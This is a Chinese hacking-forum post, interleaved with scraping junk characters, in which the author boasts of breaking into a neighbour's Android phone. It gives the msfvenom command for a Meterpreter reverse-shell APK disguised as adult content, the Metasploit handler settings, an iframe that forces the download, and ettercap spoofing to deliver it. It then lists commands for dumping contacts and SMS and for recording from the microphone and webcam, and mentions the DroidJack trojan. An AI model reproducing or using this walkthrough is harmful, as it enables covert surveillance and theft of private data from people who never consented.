找回密码
 立即注册

QQ登录

只需一步,快速开始

欢迎中测联盟老会员回家,专门使用25年老域名强势回归
查看: 85|回复: 0

metasploit+ettercap中间人攻击成功入侵邻居手机

[复制链接]
发表于 2018-10-20 20:30:37 | 显示全部楼层 |阅读模式
. K0 s' E( W0 H3 F

5 K5 a! r1 m3 Y2 ] 五、msf+ettercap入侵邻居安卓手机 8 `: U5 y7 s3 f; }4 G

2 `% Q7 ]6 R. p. R# ]

% O$ v' \# ]& r2 I 首先启动msf $ s. r& j& a5 _4 O/ c0 ?( m. J

9 _/ t! S5 o5 o, @7 M0 }7 U

% } a; W" X! I) M; G 先用kali生成一个安卓木马,如下命令: # X& h1 Z9 n! Q" g( a. x0 r

P: p# W" ]: {

+ X4 q/ `# C6 b$ k3 { Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk ! V. z% w, T! X- j4 Q

3 k" Z" \/ c- H) M% ?

8 r- p, r$ U/ S/ b2 T5 W S- F 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 s" N- F3 a9 c* F8 C$ X9 `: Q

, r0 _9 I: a$ T) X7 g& r- o6 z

9 [9 `0 s, \9 K! _( Y 然后进入msf 8 g2 f5 f4 b8 b7 q$ q# M7 ]$ a

9 R% ^0 s+ ~ `

$ [$ ^# x) H4 h% r$ u' | use exploit/multi/handler 9 x- A) T: z5 E( X) e) f

( A: y9 @* |9 O2 @$ l1 Y/ Y% _& T

7 f) J b5 G# H. ? set payload android/meterpreter/reverse_tcp 2 N6 q5 p0 I/ W: |# ^

) J* M( N `; z! L `% ^

- b- X/ S, v \9 Q6 k set LHOST 192.168.0.109 //ipkailiip 8 A9 k! k6 ^0 \: m4 j2 I: [, k. h

0 P& { U, F0 o2 U1 ^0 A3 R

) w; a! B, y5 ^+ [- d/ Q set LPORT 44444 //端口一定要与前面生成的木马的端口一致 % Q% _. @2 i# Z4 }- { O M

* G; `! g1 [3 |: Q3 B9 _: U* F% ^* M) O

. M- ^. x, L1 g9 e' r9 s+ s Exploit ( L) ?/ s- g( j4 a0 Y

4 ?9 @2 J+ ?6 }& _! s

, c) a/ `. [! {) x# Y/ x# t   6 s5 i' ]( H B5 N* B D2 b& n

+ m) n8 o9 N& x& O$ }

! P* {; `5 V* D# d G 下面我们开启ettercap -G 6 k3 n9 C& \' X& q) Z! }$ `' l% P$ E

+ i$ J8 P, ?; [6 i, [7 e9 ]

6 P3 V' A/ v& k6 g- @: q 我物理IP ( s$ \- y4 h$ I- F6 v* P6 N" F

2 o0 R5 }, a' G. {$ m8 }/ A g) n: K

$ `$ M; l! z L, I- P   y% c3 M7 q# W* Y; }: F

* r( h8 y! @3 e1 t2 q( q

" P3 R" _- X' v% @- [; Y# W 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, . S& ~- q5 c& R% ]! J# ^- D g

1 `+ f) |; `7 y/ A* {& }& r

5 d0 P$ C7 F w- r 下面我们来设置一下 6 Y/ y- {6 M+ j0 K

$ P6 }1 b9 l: Y5 [8 `* O" R

+ F: a; T$ z9 ~( |9 j% L   5 F- N' C1 \/ l0 u: L

" |8 G8 f% \! D4 f6 w& h! u

4 k; ~4 _- Q- r 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, V0 T3 [8 k$ L4 L: ~4 D# b

- C% \; {& W/ p9 e, q J

* G4 H' y) d" |! g |0 c& g   7 X7 t0 k2 s5 ~& J C4 j

3 V# w& n, t% b. i8 }$ f6 C

# z8 y, Y- U- @' G4 }( g   : Z) p7 E& F" O. v2 U

" v$ ~: t) O5 v. Q) \5 J

) |& _9 Y( A) U   ) N: |% q/ ]7 f7 Z$ Q2 s9 ^

: K6 j/ |- b/ R, j

/ A# |) Z' c/ u! N- G. W   ! S( w; Q: r2 V3 I

1 ]. f) { s/ X5 x0 a* w0 W: f

( L3 h2 E9 F3 n5 `/ s& M   ! y* p- }+ I* y5 `. s o6 H# |3 X

& e Z" f& h* z }' J1 v+ L

+ Y D! X* y1 d! j; U# X   $ D* `( m( z/ I6 l! Z% K) t

! y1 n# P; s6 ~' C5 q

5 E/ a! G1 ~) j   ! X. T: y- R% A- x% }

], V9 k3 Z; t+ |: u8 Z! T

+ w* |$ x& ^; r. ]1 n   9 ]2 I+ J# l. d6 F% [

, i. r+ }7 n8 T8 e# S9 j% Y

8 J" m- V$ M7 A   ' O8 F$ f: k" s7 j! w: y

$ C% s6 ]. z% K

5 J) [/ m( H7 f   4 V3 w. \' p+ [4 s/ z! C% k

5 s7 U3 Y, |3 p" l6 K

6 E( u1 r/ ^6 O: n3 I* s, G1 C   7 l4 F! A! B% Q5 N! @

, ? W9 |% p+ u4 U

' B# Y/ v3 z8 @9 \   & N9 N6 m+ w! s+ Q/ L

1 M% H- l/ |% h1 [

O8 l- v0 ~; D o$ a   ) y" ?+ ]1 Q+ T3 S

) T% d4 n/ I! |4 l% a

# c+ ^+ j1 e( n4 {$ ] 下面我们开始攻击 0 m$ l1 Q; \9 U, H! i

) ?% h F, T& N R& m

7 c/ P& l7 X# b: C. W( X   5 X+ P8 L4 N1 j4 I% A

9 c* M0 i3 Z2 L7 ?4 J$ o; J9 \

$ ?0 F/ [$ z1 K8 K6 M   7 q. L# G5 `# m, k9 W$ Q" k+ Q

8 |" |6 n6 O; n/ ?8 p( E! }2 v. s

% u: f9 v {+ e- P% T   : ~& r) T: i9 L8 O

3 D, _5 H: J+ u) s# L/ o

% l' w; I( k% s6 T) m   ; a) V2 h4 R# P7 g8 L' s

+ v: C) T0 G& J

+ X8 L: d3 Y+ z4 a5 q, S s( x   6 U2 o5 V6 @6 Y4 f9 ?% K1 {

; P K1 o' h6 t: W; U6 i: C

+ f' p6 g9 G3 N; N 大概过了5分钟多,发现反弹成功了 1 s3 j" S7 M* B5 B/ }

% D# u: B( {9 y# N

9 C/ \; s: |* Q& [) D* h* W, Q   ' p$ a3 s% `- ^* }; J8 ~

( B0 c' @' `& H! _1 d4 c, W+ o, \

7 \1 ?; l7 g: \5 _   / x! _2 a0 g2 n; ^: @4 k# R w) P0 D7 s

7 a. P2 W( X* @1 S+ |& t3 Y

7 _8 N6 F5 ?; T T   ' E0 Q. _% Y, N+ R. `1 Q

( U$ G1 E L( I& t. ]& {3 o

$ T/ l2 ?/ V+ }9 ?( D   9 R, I/ K X! a+ L

& g& u/ p; b/ c. R0 @! b+ @) Q8 K+ p

Y% v m, w/ Q9 Q4 q- I   - E! @& L2 i O5 U$ X8 b+ k) @

+ l& ?" W! q! O3 {3 u

$ j( |% s1 a) R9 N8 a   5 V: f( Q7 X% _& i

: Y5 ]4 J( b% a; q

3 D6 W3 T, R ~   - p( I( A3 T* e, I2 R

/ k9 U, Q4 b1 O1 {( t6 l7 e' @

' s8 b( }2 T, t2 z' D. L: B 执行命令 % i2 r5 I) M3 w4 m, s5 a$ O

$ F( ]6 X* L6 m1 Z# g# _8 y

# R& v( p* V/ n j& S* l   ; O; s5 g) c8 d6 E6 h1 L6 r

0 z: s- ~, E7 D8 y

u, E5 q: N8 M7 O6 E dump_contacts    --》这个是导出电话 3 P' Q4 o7 l) s8 d& h/ b: A& d

Q+ w& f) E8 @ S

" w( ]# v( ^! h. V) n: { dump_sms --》这个是导出信息 ' ]: z; J0 U6 Q5 y) v: u

4 z5 ?2 c9 j9 ~

& O) s0 G* q" ^: l A, v: r/ e record_mic     Record audio from the default microphone for X seconds / u" ~7 Q: z) A- y5 I% x2 C/ k. M- a2 ?

; b1 `* ]3 q; a( a

% y7 M( X0 u: f- v% J1 O7 `# B     webcam_chat    Start a video chat . a7 S! i) \# ?

% g, P5 ~7 a# g9 B

# ~1 M; N: v( ^7 W. j7 I4 c& a     webcam_list    List webcams - @% G6 ]- _+ I* E) u; b- S7 {- d& H

* y1 M3 K) d: k8 o7 p* x

! u5 |1 j. x/ s- R9 S7 W2 E- ^     webcam_snap    Take a snapshot from the specified webcam * \( }# M9 z# D" k

5 `6 j8 ?# H, m

- _' I8 b1 F0 U webcam_stream  lay a video stream from the specified webcam 9 |8 u0 t* e# W' z- Z6 r8 F

, D: ^2 m3 T9 D

- [# x1 H8 ^5 t6 {& i" H& g/ B% S7 \   4 V" r: R, O6 d! D" F

: v8 D3 p1 J" A X' u

3 z/ b- @. K. H* e, }' d   / C- Z2 ~$ b8 C1 y1 ?

. n8 C' w k) w9 y

- K5 Z9 O. _6 i- j% Z' G& \ 我们打开看一下电话薄, . x: ?0 A/ W Q9 g/ I3 |/ t3 z

1 t. i3 ?! J+ y- h3 B/ O- F

. `6 T" @+ Z/ }( m7 E! h1 {: b   2 S# T" x" I: w% A1 W

- U H# E9 L1 F. J5 f2 o4 s/ b+ s

+ W2 `( C+ K1 ~9 k* q7 r7 {# @8 b   - n0 s$ p# h* W1 t

$ |; K/ M: P9 C- u8 }, m

+ ]' {7 _# ]! _1 B* [* D   ( j. \/ |. r' g# X# y) j4 V% n

, j% A) q, r5 j: w# ?& E1 u

5 c/ J8 ?5 E0 M1 P' J   1 x: m* ]4 f3 Z$ e7 K" P3 Q

; g! U" p) A8 Q6 y2 c' X

& j' `9 r2 d+ o# L n   1 @5 u( S; [' p1 m5 p

6 ?& t1 h% j! W( l

- [( m# {4 w. u   & v+ Y: H$ P/ \

9 W; p4 U! l m& d

% v, _4 Q9 |9 K6 j) E$ S 我们同时欺骗成DroidJack木马,使用方法如图: 4 J2 f2 w! r: u# J- |; w" z6 V

' w" _6 q* E5 Y* d8 v

- Q$ T! x5 W: e& s; w4 X   * f. j- _! H/ v) y O* c7 u/ P

& R. M" `4 G$ B# S; l

7 T& R7 f1 c, S   Y4 A: I. V$ B* Q; o

0 g$ P' E4 j# ], y/ U

( h* H2 C4 F) F' Y( |- G   3 x$ J+ K% p6 B* r0 {/ ^

. l( G2 T/ [# ~

4 t# G, A8 c. [8 K: ]* J" D, [ 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 ) u& e+ [+ [+ T9 e6 K, Z7 T

5 h6 o) ?. e, E( v; P# h6 U

1 u9 u; e- P4 Y z. H3 c   : x0 `) q' p* `: P8 Y) y

% M; c- g4 `) d1 B; A

+ O' X" ` b. Q9 c   & Y$ x6 W0 X3 c' Y c, T

* Y% c4 I R7 G8 b

. J1 v; Y/ k8 a! D- i* P: k   # f/ k( s; q; @2 p5 D

4 _8 z! u9 T) @ z

f# a+ v. A* ]% `$ m- x" R0 k J/ ?: E- O$ ^( j3 b! X' L

9 t( X# f3 w" ^' W

1 a4 h2 O" A( o, x1 A
6 `2 g7 h, f2 V: k T5 d; M. b- L

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表